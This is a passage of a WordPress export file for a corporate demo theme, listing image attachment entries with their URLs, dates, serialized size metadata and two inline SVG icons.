		<pubDate>Fri, 02 Oct 2020 09:09:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1218</wp:post_id>
		<wp:post_date><![CDATA[2020-10-02 09:09:53]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-02 09:09:53]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>773</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1420;s:6:"height";i:1420;s:4:"file";s:22:"2020/09/project1.jpg";s:5:"sizes";a:8:{s:6:"medium";a:4:{s:4:"file";s:22:"project1-1-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"project1-1-1024x1024.jpg";s:5:"width";i:1024;s:6:"height";i:1024;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:22:"project1-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"project1-1-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:22:"project1-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:22:"project1-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"project1-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:24:"project1-1-1200x1200.jpg";s:5:"width";i:1200;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/finance-strategy/project2/</link>
		<pubDate>Fri, 02 Oct 2020 09:10:48 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1220</wp:post_id>
		<wp:post_date><![CDATA[2020-10-02 09:10:48]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-02 09:10:48]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>842</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1420;s:6:"height";i:1630;s:4:"file";s:22:"2020/09/project2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:22:"project2-1-261x300.jpg";s:5:"width";i:261;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"project2-1-892x1024.jpg";s:5:"width";i:892;s:6:"height";i:1024;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:22:"project2-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"project2-1-768x882.jpg";s:5:"width";i:768;s:6:"height";i:882;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:24:"project2-1-1338x1536.jpg";s:5:"width";i:1338;s:6:"height";i:1536;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:22:"project2-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:22:"project2-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"project2-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:24:"project2-1-1200x1200.jpg";s:5:"width";i:1200;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>target</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/target/</link>
		<pubDate>Mon, 05 Oct 2020 07:57:01 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/target.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1247</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 07:57:01]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 07:57:01]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[target]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/target.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/target.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M136.53,207.562c0.446,0.08,0.89,0.118,1.327,0.118c3.564,0,6.726-2.552,7.375-6.183   c6.598-36.951,26.111-70.729,54.946-95.113c29.17-24.667,66.308-38.252,104.571-38.252c40.815,0,79.809,15.224,109.798,42.867   c3.044,2.808,7.791,2.614,10.598-0.432s2.614-7.79-0.432-10.598c-32.767-30.204-75.372-46.838-119.964-46.838   c-41.804,0-82.381,14.844-114.257,41.798c-31.498,26.635-52.816,63.545-60.027,103.93   C129.737,202.938,132.452,206.834,136.53,207.562z"></path>
	<path d="M395.017,329.524c1.897,0,3.797-0.716,5.257-2.151c26.279-25.831,40.752-60.348,40.752-97.193   c0-75.144-61.134-136.278-136.278-136.278c-30.819,0-61.021,10.578-85.044,29.787c-23.652,18.912-40.526,45.458-47.516,74.75   c-0.961,4.029,1.526,8.075,5.555,9.036c4.032,0.962,8.075-1.525,9.036-5.555c6.218-26.059,21.238-49.681,42.293-66.517   c21.683-17.338,47.852-26.502,75.676-26.502c66.873,0,121.278,54.405,121.278,121.278c0,32.789-12.88,63.507-36.267,86.496   c-2.954,2.903-2.995,7.652-0.091,10.606C391.137,328.775,393.076,329.524,395.017,329.524z"></path>
	<path d="M367.008,334.279c-18.747,11.238-40.276,17.178-62.26,17.178c-33.428,0-64.563-13.311-87.672-37.481   c-2.862-2.994-7.609-3.101-10.604-0.238c-2.994,2.862-3.101,7.61-0.238,10.604c25.965,27.158,60.952,42.115,98.514,42.115   c24.7,0,48.896-6.678,69.972-19.313c3.553-2.129,4.707-6.736,2.577-10.289C375.168,333.303,370.561,332.148,367.008,334.279z"></path>
	<path d="M304.748,139.704c-18.697,0-36.643,5.656-51.899,16.357c-14.907,10.456-26.202,24.94-32.665,41.888   c-1.476,3.87,0.465,8.204,4.335,9.68c3.87,1.478,8.205-0.465,9.68-4.335c11.083-29.063,39.434-48.59,70.548-48.59   c41.617,0,75.476,33.858,75.476,75.475s-33.858,75.476-75.476,75.476c-15.522,0-30.43-4.673-43.111-13.515   c-12.404-8.648-21.838-20.637-27.283-34.672c-1.498-3.861-5.843-5.777-9.705-4.279c-3.861,1.498-5.777,5.843-4.279,9.705   c6.527,16.823,17.83,31.191,32.688,41.55c15.21,10.605,33.084,16.211,51.69,16.211c49.888,0,90.476-40.587,90.476-90.476   S354.637,139.704,304.748,139.704z"></path>
	<path d="M120.319,294.523c-3.664-1.934-8.201-0.528-10.132,3.136c-10.091,19.14-23.911,45.353-5.271,71.411   c1.427,1.995,3.713,3.137,6.1,3.137c0.549,0,1.104-0.061,1.655-0.186c2.943-0.666,5.201-3.031,5.729-6.002   c1.514-8.514,8.798-18.489,22.206-30.367c9.176,13.464,21.644,24.868,38.622,35.423c3.039,1.889,6.986,1.369,9.432-1.241   c2.446-2.609,2.709-6.583,0.628-9.492c-13.336-18.643-3.311-37.522,8.297-59.383c10.34-19.473,21.84-41.151,13.625-63.282h51.721   c3.553,19.865,20.946,34.995,41.817,34.995c23.431,0,42.494-19.063,42.494-42.494s-19.063-42.494-42.494-42.494   c-20.87,0-38.262,15.128-41.817,34.992H113.867L79.721,197.25c-1.294-0.964-2.865-1.485-4.479-1.485H7.5   c-3.057,0-5.809,1.856-6.954,4.69c-1.145,2.835-0.455,6.081,1.744,8.205c5.898,5.696,9.147,13.338,9.147,21.52   c0,8.182-3.249,15.824-9.146,21.519c-2.2,2.124-2.89,5.37-1.745,8.205c1.146,2.835,3.896,4.691,6.954,4.691h67.741   c1.614,0,3.185-0.521,4.479-1.485l34.151-25.431h8.604c5.668,9.724,5.769,20.11,0.451,33.965c-1.484,3.867,0.447,8.206,4.314,9.69   c3.865,1.483,8.205-0.448,9.689-4.314c3.859-10.053,7.708-24.167,2.098-39.34h55.631c10.182,17.631,0.635,35.61-10.322,56.246   c-8.297,15.625-17.349,32.67-16.356,50.23c-7.978-7.166-14.203-14.884-19.047-23.522c-1.084-1.932-2.966-3.286-5.143-3.7   c-2.177-0.41-4.424,0.158-6.141,1.558c-12.267,10.01-20.948,18.887-26.546,27.296c-1.776-12.667,4.358-25.971,12.352-41.133   C125.388,300.991,123.983,296.455,120.319,294.523z M304.748,202.686c15.16,0,27.494,12.333,27.494,27.494   s-12.333,27.494-27.494,27.494c-12.56,0-23.172-8.469-26.445-19.995h26.447c4.142,0,7.5-3.358,7.5-7.5s-3.358-7.5-7.5-7.5h-26.446   C281.578,211.154,292.189,202.686,304.748,202.686z M72.755,249.594H22.053c2.871-5.976,4.384-12.568,4.384-19.415   c0-6.846-1.513-13.439-4.384-19.415h50.702l26.071,19.415L72.755,249.594z"></path>
	<path d="M504.5,443.863h-53.2l-41.456-71.217c45.173-33.355,71.947-86.089,71.947-142.469c0-38.807-12.322-75.65-35.633-106.547   c-2.494-3.306-7.197-3.964-10.504-1.47c-3.307,2.495-3.965,7.198-1.47,10.504c21.332,28.273,32.607,61.993,32.607,97.513   c0,53.746-26.574,103.887-71.089,134.129c-10.63,7.233-22.116,13.165-34.149,17.671c-0.38,0.142-0.756,0.297-1.138,0.436   c0,0-0.001,0-0.001,0c-0.001,0-0.001,0-0.002,0.001c-17.781,6.511-36.508,9.813-55.661,9.813c-19.126,0-37.855-3.302-55.664-9.813   c-12.421-4.543-24.298-10.64-35.328-18.138c-2.229-1.501-4.558-3.174-7.117-5.114c-3.301-2.504-8.004-1.856-10.507,1.444   s-1.856,8.005,1.444,10.508c0.7,0.531,1.385,1.044,2.058,1.541l-41.446,71.208h-53.194c-4.142,0-7.5,3.358-7.5,7.5   s3.358,7.5,7.5,7.5h57.43c0.025,0,0.049,0.005,0.073,0.005h54.31c0.023,0,0.045-0.005,0.068-0.005h175.733   c0.023,0,0.045,0.005,0.068,0.005h54.31c0.025,0,0.049-0.005,0.073-0.005H504.5c4.142,0,7.5-3.358,7.5-7.5   S508.642,443.863,504.5,443.863z M397.399,443.863l-24.158-50.375c0.631-0.265,1.257-0.541,1.885-0.813   c0.259-0.112,0.519-0.222,0.777-0.335c1.445-0.635,2.881-1.292,4.309-1.965c0.3-0.141,0.598-0.285,0.897-0.429   c1.42-0.68,2.833-1.373,4.235-2.091c0.049-0.025,0.098-0.049,0.147-0.074c1.435-0.737,2.856-1.499,4.271-2.275   c0.302-0.165,0.603-0.331,0.904-0.498c1.384-0.77,2.759-1.555,4.121-2.361c0.206-0.122,0.411-0.248,0.617-0.371   c0.665-0.398,1.331-0.793,1.991-1.2l36.55,62.787H397.399z M359.112,398.716l21.651,45.147H228.729l21.659-45.15   c17.515,5.648,35.768,8.515,54.362,8.515C323.367,407.228,341.62,404.361,359.112,398.716z M212.108,381.047   c7.734,4.76,15.815,8.915,24.16,12.421l-24.175,50.395h-36.546L212.108,381.047z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>profit</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/profit/</link>
		<pubDate>Mon, 05 Oct 2020 07:57:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/profit.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1248</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 07:57:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 07:57:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[profit]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/profit.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/profit.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M54.754,149.62h87.326l-29.633,43.741c-2.323,3.429-1.426,8.092,2.003,10.415c3.43,2.322,8.093,1.427,10.416-2.003   l35.332-52.153h48.731l81.4,120.155c1.45,2.14,3.812,3.294,6.216,3.294c1.448,0,2.911-0.419,4.2-1.292   c3.429-2.323,4.326-6.986,2.003-10.415l-80.751-119.196l48.252-69.697c6.55-9.462,7.301-21.671,1.96-31.864   S256.402,24.08,244.895,24.08H124.232c-11.508,0-21.974,6.332-27.315,16.525s-4.59,22.402,1.96,31.865l31.663,45.734L66.664,80.396   c-3.565-2.109-8.164-0.93-10.274,2.634c-2.11,3.564-0.931,8.165,2.634,10.274l69.801,41.315h-74.07c-4.142,0-7.5,3.357-7.5,7.5   S50.612,149.62,54.754,149.62z M110.204,47.567c2.785-5.314,8.029-8.487,14.028-8.487h120.662c6,0,11.244,3.173,14.028,8.487   c2.785,5.313,2.408,11.432-1.007,16.364l-48.938,70.688h-48.828l-48.938-70.688C107.796,58.999,107.419,52.881,110.204,47.567z"></path>
	<path d="M393.083,250.087c-65.571,0-118.917,53.346-118.917,118.917c0,36.209,16.273,68.685,41.883,90.514   c-13.427,8.683-29.198,13.402-45.309,13.402H98.39c-22.276,0-43.217-8.674-58.967-24.424C23.674,432.747,15,411.806,15,389.53   c0-16.737,4.962-32.908,14.349-46.764l78.52-115.899c2.323-3.43,1.427-8.093-2.002-10.416c-3.429-2.322-8.093-1.427-10.416,2.002   l-78.52,115.899C5.854,350.701,0,369.781,0,389.53c0,26.282,10.234,50.99,28.817,69.573c18.582,18.582,43.291,28.816,69.573,28.816   h172.35c20.862,0,41.245-6.703,58.015-18.945c18.557,11.982,40.644,18.945,64.328,18.945C458.654,487.92,512,434.574,512,369.004   C512,303.433,458.654,250.087,393.083,250.087z M393.083,472.92c-57.3,0-103.917-46.616-103.917-103.916   s46.617-103.917,103.917-103.917S497,311.704,497,369.004S450.383,472.92,393.083,472.92z"></path>
	<path d="M470.074,327.032c-1.986-3.635-6.542-4.972-10.177-2.986c-3.635,1.985-4.973,6.542-2.987,10.178   c5.787,10.595,8.846,22.621,8.846,34.78c0,40.072-32.601,72.673-72.673,72.673s-72.673-32.601-72.673-72.673   s32.601-72.673,72.673-72.673c16.979,0,33.497,5.978,46.512,16.831c3.181,2.653,7.911,2.224,10.563-0.956   c2.653-3.182,2.225-7.911-0.956-10.563c-15.706-13.098-35.636-20.312-56.119-20.312c-48.343,0-87.673,39.33-87.673,87.673   s39.33,87.673,87.673,87.673s87.673-39.33,87.673-87.673C480.756,354.34,477.063,339.826,470.074,327.032z"></path>
	<path d="M393.083,426.906c4.142,0,7.5-3.357,7.5-7.5v-7.827h2.454c13.806,0,25.038-11.232,25.038-25.038   s-11.232-25.037-25.038-25.037h-19.908c-5.535,0-10.038-4.503-10.038-10.038s4.503-10.038,10.038-10.038h29.192   c4.142,0,7.5-3.357,7.5-7.5s-3.358-7.5-7.5-7.5h-11.738v-7.827c0-4.143-3.358-7.5-7.5-7.5s-7.5,3.357-7.5,7.5v7.827h-2.454   c-13.806,0-25.038,11.232-25.038,25.038s11.232,25.038,25.038,25.038h19.908c5.535,0,10.038,4.503,10.038,10.037   c0,5.535-4.503,10.038-10.038,10.038h-29.192c-4.142,0-7.5,3.357-7.5,7.5s3.358,7.5,7.5,7.5h11.739v7.827   C385.583,423.549,388.941,426.906,393.083,426.906z"></path>
	<path d="M332.578,156.935l5.861-4.688v68.76c0,4.143,3.358,7.5,7.5,7.5s7.5-3.357,7.5-7.5v-68.76l5.861,4.688   c1.383,1.106,3.037,1.644,4.68,1.644c2.2,0,4.38-0.963,5.861-2.814c2.588-3.235,2.063-7.954-1.171-10.542l-18.046-14.437   c-0.019-0.016-0.042-0.025-0.061-0.041c-0.315-0.248-0.648-0.473-1.001-0.668c-0.007-0.003-0.013-0.008-0.02-0.012   c-0.339-0.186-0.696-0.339-1.064-0.472c-0.05-0.018-0.1-0.038-0.15-0.055c-0.347-0.116-0.704-0.207-1.071-0.272   c-0.065-0.011-0.129-0.02-0.193-0.029c-0.368-0.056-0.741-0.093-1.124-0.093s-0.756,0.038-1.124,0.093   c-0.065,0.01-0.129,0.018-0.193,0.029c-0.367,0.065-0.725,0.156-1.071,0.272c-0.051,0.017-0.1,0.037-0.15,0.055   c-0.368,0.132-0.725,0.286-1.064,0.472c-0.007,0.004-0.013,0.009-0.02,0.012c-0.353,0.195-0.686,0.421-1.001,0.668   c-0.02,0.016-0.042,0.025-0.061,0.041l-18.046,14.437c-3.234,2.588-3.759,7.307-1.171,10.542   C324.624,158.997,329.342,159.522,332.578,156.935z"></path>
	<path d="M426.867,116.712l5.861-4.688v68.76c0,4.143,3.358,7.5,7.5,7.5s7.5-3.357,7.5-7.5v-68.76l5.861,4.688   c1.383,1.106,3.037,1.644,4.68,1.644c2.2,0,4.38-0.963,5.861-2.814c2.588-3.235,2.063-7.954-1.171-10.542l-18.046-14.437   c-0.019-0.016-0.042-0.025-0.061-0.041c-0.315-0.248-0.648-0.473-1.001-0.668c-0.007-0.003-0.013-0.008-0.02-0.012   c-0.339-0.186-0.696-0.339-1.064-0.472c-0.05-0.018-0.1-0.038-0.15-0.055c-0.347-0.116-0.704-0.207-1.071-0.272   c-0.065-0.011-0.129-0.02-0.193-0.029c-0.368-0.056-0.741-0.093-1.124-0.093s-0.756,0.038-1.124,0.093   c-0.065,0.01-0.129,0.018-0.193,0.029c-0.367,0.065-0.725,0.156-1.071,0.272c-0.051,0.017-0.1,0.037-0.15,0.055   c-0.368,0.132-0.725,0.286-1.064,0.472c-0.007,0.004-0.013,0.009-0.02,0.012c-0.353,0.195-0.686,0.421-1.001,0.668   c-0.02,0.016-0.042,0.025-0.061,0.041l-18.046,14.437c-3.234,2.588-3.759,7.307-1.171,10.542   C418.913,118.774,423.632,119.299,426.867,116.712z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>product-12</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/product-12/</link>
		<pubDate>Mon, 05 Oct 2020 10:07:13 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/product-12.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1268</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 10:07:13]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 10:07:13]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[product-12]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/product-12.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/product-12.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:570;s:6:"height";i:599;s:4:"file";s:24:"2020/10/product-12.png";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:24:"product-12-1-285x300.png";s:5:"width";i:285;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"product-12-1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"product-12-1-570x400.png";s:5:"width";i:570;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>product-10</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/product-10/</link>
		<pubDate>Mon, 05 Oct 2020 10:09:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/product-10.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1270</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 10:09:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 10:09:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[product-10]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/product-10.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/product-10.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:570;s:6:"height";i:599;s:4:"file";s:24:"2020/10/product-10.png";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:24:"product-10-1-285x300.png";s:5:"width";i:285;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"product-10-1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"product-10-1-570x400.png";s:5:"width";i:570;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>product-11</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/product-11/</link>
		<pubDate>Mon, 05 Oct 2020 10:10:10 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/product-11.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1271</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 10:10:10]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 10:10:10]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[product-11]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
